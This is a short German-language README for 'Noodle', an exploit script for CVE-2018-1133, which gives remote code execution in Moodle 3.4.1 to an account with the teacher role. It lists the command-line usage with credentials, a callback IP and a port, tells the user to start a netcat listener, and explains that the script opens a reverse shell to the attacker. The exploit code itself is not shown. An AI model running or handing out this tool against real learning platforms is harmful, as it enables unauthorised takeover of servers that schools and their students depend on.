
Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133
Ein Benutzer mit der Lehrerrolle kann beliebigen Code ausführen.
php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1
user The account username
pass The password to the account
ip Callback IP
port Callback Port
course Valid course ID belonging to the teacher
Stelle sicher, dass du einen Netcat-Listener auf dem angegebenen Port laufen lässt, bevor du dieses Skript ausführst.
nc -lnvp 1010
Dieses Skript versucht, eine Reverse-Shell zur angegebenen IP und zum angegebenen Port zu öffnen.
Dieser Exploit basiert auf Informationen von Robin Peraglie.
Weiterführende Lektüre: https://blog.ripstech.com/2018/moodle-remote-code-execution